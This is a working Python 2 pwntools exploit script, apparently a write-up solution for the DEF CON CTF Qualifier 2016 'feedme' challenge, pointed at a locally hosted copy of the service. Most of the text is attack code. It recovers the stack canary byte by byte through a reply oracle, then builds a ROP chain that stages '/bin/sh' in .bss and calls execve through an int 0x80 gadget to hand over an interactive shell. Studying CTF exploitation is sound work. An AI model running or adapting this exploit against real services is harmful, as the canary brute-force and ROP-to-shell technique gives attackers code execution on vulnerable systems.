#!/usr/bin/env python2 | |
# DEF CON CTF Qualifier 2016 : feedme | |
# https://github.com/ctfs/write-ups-2016/tree/master/def-con-ctf-qualifiers-2016/pwn/feedme | |
#
# Write-up script for the 'feedme' pwn challenge (a CTF practice binary,
# served here from localhost -- see the remote() call below). Runs on
# Python 2 (str payloads, chr()) and uses pwntools for socket I/O and p32().
#
# Structure; every address and offset is taken from the radare2 / gadget
# search output quoted in the comment next to it:
#   1. recover the stack canary one byte at a time, using the service's
#      reply as an oracle for whether a partial overwrite was accepted;
#   2. overflow again with the recovered canary and a ROP chain that stages
#      data in .bss via read(0, addr_bss, 0x400) and then issues syscall
#      0xb through an `int 0x80` gadget;
#   3. send the staged data and hand the connection to the user.
#
# NOTE: the trailing " | |" on each line is rendering residue from the gist
# page, not part of the script, and the loop body below has lost its
# indentation in the same way.
from pwn import * | |
# [0x08049036]> pdf | |
# / (fcn) fcn.08049036 122 | |
# | fcn.08049036 (); | |
# | ; var int ate_size @ ebp-0x2d | |
# | ; var int buffer @ ebp-0x2c | |
# | ; var int canary @ ebp-0xc | |
# | ; var int local_4h @ esp+0x4 | |
# | ; var int local_8h @ esp+0x8 | |
# Distance from the start of `buffer` (ebp-0x2c) to `canary` (ebp-0xc) in
# the listing above: 0x2c - 0xc = 0x20 bytes of padding before the canary.
buffer_size = 0x20 | |
# 0x08048e48 c74424080100. mov dword [esp + 8], 1 | |
# 0x08048e50 8d45f3 lea eax, dword [ebp - local_dh] | |
# 0x08048e53 89442404 mov dword [esp + 4], eax | |
# 0x08048e57 c70424000000. mov dword [esp], 0 | |
# 0x08048e5e e80d4a0200 call fcn.0806d870 | |
# Target of the `call fcn.0806d870` above; the chain below calls it as
# read(fd, buf, count) (see the "read(0, addr_bss, 0x400)" comment).
addr_read = 0x806d870 | |
# [0x08048e7e]> iS~.bss | |
# idx=16 vaddr=0x080e9f50 paddr=0x000a0f50 sz=24 vsz=24 perm=--rw- name=.tbss | |
# idx=24 vaddr=0x080eaf80 paddr=0x000a1f80 sz=6156 vsz=6156 perm=--rw- name=.bss | |
# Writable scratch area: start of .bss from the section listing above. Stage
# 3 writes the "/bin/sh" string and its argv array here.
addr_bss = 0x080eaf80 | |
# ROP gadgets; the trailing comment on each line is the gadget-search hit it
# was taken from.
addr_ret = 0x080481b2 # 0x080481b2: ret ; (3708 found) | |
addr_int_0x80 = 0x0806fa20 # 0x0806fa20: int 0x80 ; ret ; (1 found) | |
addr_pop_eax_ret = 0x080bb496 # 0x080bb496: pop eax ; ret ; (4 found) | |
addr_pop_edx_ecx_ebx_ret = 0x0806f370 # 0x0806f370: pop edx ; pop ecx ; pop ebx ; ret ; (1 found) | |
# Connect to a locally hosted instance of the challenge service. The two
# commented-out lines run the binary directly instead.
r = remote('localhost', 4000) | |
# r = process('./feedme') | |
# r = process('./feedme-patched') | |
# Stage 1: recover the canary byte by byte.
#
# `canary` starts at 0, so its lowest byte is always sent as 0x00 and is never
# searched. For each higher byte position i (1..3) the inner loop increments
# that byte, overflows the buffer with 'A' * buffer_size, and appends only the
# first i+1 bytes of the guessed canary. A reply containing 'YUM,' before the
# 'Child exit.' marker is treated as "guess accepted"; anything else is
# presumably the stack check firing, and the next value is tried.
#
# NOTE(review): this search only works if every child that handles a request
# carries the same canary value (children of one long-lived parent); the
# 'Child exit.' marker suggests that setup -- confirm against the binary. A
# service that re-executes per connection gets a fresh canary each time,
# which is the usual mitigation for this kind of oracle.
log.info('finding canary...') | |
canary = 0x00000000 | |
for i in range(1, 4): | |
while True: | |
r.recvuntil('FEED ME!\n') | |
canary += (0x01 << (i * 8)) | |
log.debug('trying canary: 0x{:08x}'.format(canary)) | |
payload = '' | |
payload += 'A' * buffer_size | |
payload += p32(canary)[:i + 1] | |
# Each payload is preceded by a single length byte; this matches the one-byte
# `ate_size` variable in the listing above (the service appears to read a
# size byte followed by that many bytes).
r.send(chr(len(payload))) | |
r.send(payload) | |
if 'YUM,' in r.recvuntil('Child exit.\n'): | |
break | |
log.success('canary found!: 0x{:08x}'.format(canary)) | |
# Stage 2: overflow again with the full recovered canary, then the ROP chain.
r.recvuntil('FEED ME!\n') | |
payload = '' | |
payload += 'A' * buffer_size | |
payload += p32(canary) | |
# ret sled: padding from the end of the canary up to and past the saved
# return address. Each `ret` just pops the next chain entry, so the exact
# count only has to be large enough to cover the gap.
payload += p32(addr_ret) * 10 | |
# read(0, addr_bss, 0x400) | |
# addr_read returns into the pop-edx/ecx/ebx gadget, which discards the three
# stack arguments (0, addr_bss, 0x400) before the chain continues.
payload += p32(addr_read) | |
payload += p32(addr_pop_edx_ecx_ebx_ret) | |
payload += p32(0) | |
payload += p32(addr_bss) | |
payload += p32(0x400) | |
# eax = 0x0b, ebx = addr_bss, ecx = addr_bss + 0x8, edx = 0x0, int 0x80 | |
# Register setup for the syscall, as the comment above says: ebx points at the
# string stage 3 writes to addr_bss, ecx at the pointer array at addr_bss+0x8,
# edx is 0, and eax = 0xb selects the syscall number before `int 0x80`.
payload += p32(addr_pop_edx_ecx_ebx_ret) | |
payload += p32(0) | |
payload += p32(addr_bss + 0x8) | |
payload += p32(addr_bss) | |
payload += p32(addr_pop_eax_ret) | |
payload += p32(0xb) | |
payload += p32(addr_int_0x80) | |
log.info('sending ROP (0x{:x} bytes)'.format(len(payload))) | |
r.send(chr(len(payload))) | |
r.send(payload) | |
# Drop whatever the service printed in response before sending stage 3.
r.clean() | |
# Stage 3: the bytes consumed by the read() in the chain. Layout in .bss:
#   addr_bss        "/bin/sh" padded with NULs to 8 bytes
#   addr_bss + 0x8  pointer back to addr_bss (argv[0])
#   addr_bss + 0xc  0 (argv terminator)
# sendline() appends a '\n', which lands after the terminator inside the
# 0x400-byte read and is not referenced by the chain.
log.info('sending \'/bin/sh\', [\'/bin/sh\', NULL]') | |
payload = '' | |
payload += '/bin/sh'.ljust(0x8, '\x00') # addr_bss | |
payload += p32(addr_bss) # addr_bss + 0x8 | |
payload += p32(0) # addr_bss + 0xc | |
r.sendline(payload) | |
# Hand the open connection over to the user.
r.interactive() |